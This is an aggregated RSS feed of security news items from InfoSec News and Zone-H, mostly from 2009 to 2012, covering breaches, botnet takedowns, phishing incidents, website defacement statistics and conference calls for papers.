http://www.infosecnews.org/isn.rss InfoSec News: Are we talking "cyber war" like the Bush admin talked WMDs?: http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars By Matthew Lasar Ars Technica April 27, 2011 Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. [...]

==> Oracle hedging its vulnerability reports?

http://www.infosecnews.org/isn.rss InfoSec News: Oracle hedging its vulnerability reports?: http://www.computerworld.com/s/article/9216213/Oracle_hedging_its_vulnerability_reports_ By Joab Jackson IDG News Service April 27, 2011 Oracle may be subtly misleading customers about the severity of some of the vulnerabilities found in its database software, according to [...]

==> PlayStation credit card data was encrypted

http://www.infosecnews.org/isn.rss InfoSec News: PlayStation credit card data was encrypted: http://www.zdnet.com.au/playstation-credit-card-data-was-encrypted-339314012.htm By Darren Pauli ZDNet.com.au April 28th, 2011 Sony has confirmed that the credit card details possibly stolen in a breach of its PlayStation Network (PSN) were encrypted. [...]

==> Phone-hacking laws are 'very uneven and unclear'

http://www.infosecnews.org/isn.rss InfoSec News: Phone-hacking laws are 'very uneven and unclear': http://www.guardian.co.uk/media/2011/apr/26/phone-hacking-laws-christopher-graham By James Robinson guardian.co.uk 26 April 2011 The information commissioner has told a powerful group of MPs that legislation outlawing phone hacking is "very uneven" and "very unclear" [...]

==> USENIX WOOT '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: USENIX WOOT '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 5th USENIX Workshop on Offensive Technologies (WOOT '11) is approaching. Please submit all work by May 2, 2011, at 11:59 p.m. PDT. [...]

==> USENIX HotSec '11 Submission Deadline Extended

http://www.infosecnews.org/isn.rss InfoSec News: USENIX HotSec '11 Submission Deadline Extended: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org>

I'm writing to remind you that the submission deadline for the 6th USENIX Workshop on Hot Topics in Security has been extended. Please submit all work by 11:59 p.m. EST on May 12, 2011.

HotSec takes a broad view of security and privacy and encompasses research on new security ideas and problems. Cross-discipline papers identifying new security problems or exploring approaches not previously applied to security will be given special consideration. All submissions should propose new directions of research, advocate non-traditional approaches, report on noteworthy experience in an emerging area, or generate lively discussion around an important topic.

Topics of interest include, but are not limited to, the following:

* Large-scale threats
* Network security
* Hardware security
* Software security
* Physical security
* Programming languages
* Applied cryptography
* Privacy
* Human-computer interaction
* Emerging computing environment
* Sociology
* Economics

Attendance will be limited to 35-50 participants, with preference given to the authors of accepted position papers/presentations. Submission guidelines and more information can be found at http://www.usenix.org/hotsec11/cfpb

HotSec '11 will take place Tuesday, August 9, 2011, in San Francisco, CA. It is co-located with the 20th USENIX Security Symposium, which will take place August 10-12, 2011.

We look forward to your submissions.

Patrick McDaniel, Pennsylvania State University
HotSec '11 Program Chair
hotsec11chair (at) usenix.org

==> Court order cripples Coreflood botnet, says FBI

http://www.infosecnews.org/isn.rss InfoSec News: Court order cripples Coreflood botnet, says FBI: http://www.computerworld.com/s/article/9216190/Court_order_cripples_Coreflood_botnet_says_FBI By Gregg Keizer Computerworld April 26, 2011 Although the Federal Bureau of Investigation (FBI) said a federal temporary restraining order has crippled the Coreflood botnet in the U.S. [...]

==> China Implicated In Hacking Of SMB Online Bank Accounts

http://www.infosecnews.org/isn.rss InfoSec News: China Implicated In Hacking Of SMB Online Bank Accounts: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229402294/china-implicated-in-hacking-of-smb-online-bank-accounts.html By Kelly Jackson Higgins Darkreading April 26, 2011 This time it wasn't an "advanced persistent threat" associated with [...]

==> Is Iran just seeing Stars?

http://www.infosecnews.org/isn.rss InfoSec News: Is Iran just seeing Stars?: http://www.csoonline.com/article/680599/is-iran-just-seeing-stars- By Robert Lemos CSO April 26, 2011 An Iranian official caused a stir Monday, claiming the nation's cybersecurity experts found another digital attack aimed at the Islamic country's systems. [...]

==> Police: Wireless network hacker targeted Seattle-area businesses

http://www.infosecnews.org/isn.rss InfoSec News: Police: Wireless network hacker targeted Seattle-area businesses: http://www.seattlepi.com/local/article/Police-Wireless-network-hacker-targeted-1344185.php By LEVI PULKKINEN SEATTLEPI.COM STAFF April 19, 2011 Law officers have moved to seize a Seattle man's car they claim was used in a "wardriving" spree that saw Seattle-area wireless networks hacked [...]

==> New Workshop: USENIX FOCI '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: New Workshop: USENIX FOCI '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> We're writing to remind you that the submission deadline for the first USENIX Workshop on Free and Open Communications on the Internet (FOCI '11) is approaching. Please submit your work by May 1, 2011, at 11:59 p.m. PDT. http://www.usenix. [...]

==> The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures

http://www.infosecnews.org/isn.rss InfoSec News: The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures: http://www.eweekeurope.co.uk/comment/the-rising-tide-of-cyber-threats-could-engulf-national-infrastructures-27457 By Eric Doyle eWEEK Europe April 25, 2011 Cyber-attacks are increasing but national infrastructures are ill-prepared to defend themselves. [...]

==> DHS chief: What we learned from Stuxnet

http://www.infosecnews.org/isn.rss InfoSec News: DHS chief: What we learned from Stuxnet: http://www.computerworld.com/s/article/9216166/DHS_chief_What_we_learned_from_Stuxnet By Robert McMillan IDG News Service April 25, 2011 If there's a lesson to be learned from last year's Stuxnet worm, it's that the private sector needs to be able to respond quickly to [...]

==> Dataloss Weekly Week of Sunday, April 17, 2011

http://www.infosecnews.org/isn.rss InfoSec News: Dataloss Weekly Week of Sunday, April 17, 2011:
Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, April 17, 2011 45 Incidents Added.
[...]

==> Phishing: Consumer Education Lacking

http://www.infosecnews.org/isn.rss InfoSec News: Phishing: Consumer Education Lacking: http://www.bankinfosecurity.com/articles.php?art_id=3571 By Tracy Kitten Managing Editor Bank Info Security April 22, 2011 The Oak Ridge National Laboratory, located in Tennessee, recently disconnected Internet access after hackers attacked employees at the federal facility. [...]

==> 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems

http://www.infosecnews.org/isn.rss InfoSec News: 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems: Forwarded from: Marius Minea <marius (at) cs.upt.ro> CALL FOR PAPERS [ PDF version at: http://crisis2011.cs.upt.ro/CRiSIS2011-CfP.pdf ] The Sixth International Conference on Risks and Security of Internet and Systems CRiSIS 2011 Timisoara, Romania, 26-28 September 2011 [...]

==> Phishing Attack Hits Oak Ridge National Laboratory

http://www.infosecnews.org/isn.rss InfoSec News: Phishing Attack Hits Oak Ridge National Laboratory: http://www.informationweek.com/news/government/security/229402048 By Elizabeth Montalbano InformationWeek April 21, 2011 The Department of Energy's Oak Ridge National Laboratory is investigating a sophisticated phishing attack that forced it to shut down email and Internet access last week. [...]

==> Hacker diagnosed with brain cancer, hacks the closed source report distributing it to the open source community hoping to get some help

http://www.zone-h.org/rss/news This is somewhat astonishing news, and once again a demonstration that alternative thinking might be the way to solve apparently unsolvable cases. I just report what was written by the hacker himself on his website. Can anyone help? Rome, September 10th 2012 I have a brain cancer. Yesterday I went to get my digital medical records: I have to show them to many doctors. Sadly they were in a closed, proprietary format and, thus, I could not open them using my computer, or send them in this format to all the people who could have saved my life.

==> Zone-H celebrates its 10 years!

http://www.zone-h.org/rss/news 10 years ago Zone-H opened, a little website with security news and a "cybercrime archive" which quickly became a success story. The goals of Zone-H were to follow security trends and analyze the growing importance of hacktivism.

==> Turkish hacking group defaces UPS, TheRegister, Acer, Telegraph, Vodafone

http://www.zone-h.org/rss/news At the time of writing these websites are still defaced, with a black page written "TurkguvenLigi" and "4 Sept. We TurkGuvenligi declare this day as World Hackers Day - Have fun ;) h4ck y0u". What do ups.com, vodafone.com, theregister.co.uk, acer.com, betfair.com, nationalgeographic.com and telegraph.co.uk have in common? They all use NetNames as their registrar.

==> Zone-H banned by some Indian ISPs: some workarounds

http://www.zone-h.org/rss/news As some of you probably know, Zone-H has been banned from some Indian ISPs following the E2-labs scandals and a lawsuit from E2labs and Zaki Qureshey in an Indian court, who claimed our documents and articles were defamatory (great joke!). Zone-H was unable to defend itself as we didn't receive any notification from the court. What is even funnier (scarier?) is that bloggernews.net has also been banned...

==> New attack vector in DDoS observed

http://www.zone-h.org/rss/news This article is a result of the joint research of Jakub Alimov from Seznam.cz and minor from Zone-h.org. If you have anything to say about this, write to comments [a} zone-h{dot]org. The topic was presented at the SPI conference in Brno/CZ. While protecting users from receiving a huge amount of unsolicited bulk mail, a new attack scenario against DNS servers was observed. The scenario involves sending spam messages to SMTP services with a big bandwidth.

==> The old "new" Japanese scams

http://www.zone-h.org/rss/news Dear friends, in these days we all turned our minds to Japan, to the Japanese people; some of them are our friends, or some of our friends live in Japan. We would like to express our condolences to the families which lost their family members. We are deeply concerned about the injuries and losses caused by the earthquakes, tsunami flooding and the nuclear catastrophe. Nevertheless, we have to express our anger as well. We already recorded the first set of scam emails asking unaware users to donate to charity, but as usual the money will never reach the victims.

==> Defacements Statistics 2010: Almost 1,5 million websites defaced, what's happening?

http://www.zone-h.org/rss/news Last year Zone-H archived a sad record number: we archived 1.419.203 website defacements. Why and how is this happening? If you look at the stats, things remain the same: file inclusion, SQL injection, WebDAV attacks and share misconfiguration are still at the top ranks of the attack methods used by defacers to gain first access into the server. As an important factor influencing the stats we consider the fact that last year brought a very high number of local Linux kernel exploits.

==> Notes on the Wikileaks case

http://www.zone-h.org/rss/news First of all, we would like to emphasize that Zone-H is not related to any party in the Wikileaks case. We neither agree nor disagree with any action that happened; we just want to share our opinion on the forthcoming events. Already many news media have released information about the cables, sources, how it happened etc. But now it is clear that Wikileaks will not stop publishing the cables. There are plenty of mirrors all around the globe and the information is shared over Facebook and Twitter. Also the arrest of Julian Assange can't stop the day-by-day publishing of the cables.

==> Defacements Statistics 2008 - 2009 - 2010*

http://www.zone-h.org/rss/news When Zone-H started back in 2002, we were receiving an average of 2500 defacements monthly; this number keeps on increasing year after year. For example, last month we registered over 95.000 defacements, while we only had 60.000 in 2009 for the same period. What we can also say from these numbers is that the methods used are still the same: most of the vulnerabilities exploited are in web applications. We also know from what we monitored that registrar attacks greatly increased in the past years, even if this number is quite low compared to the total of attacks.

==> Twitter and Baidu hijacked by "Iranian Cyber Army"

http://www.zone-h.org/rss/news You probably read that story somewhere last month: on December 17 2009 Twitter's homepage was replaced by this message: "Iranian Cyber Army THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY iRANiAN.CYBER.ARMY@GMAIL.COM U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To…. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA? WE PUSH THEM IN EMBARGO LIST ;) Take Care.
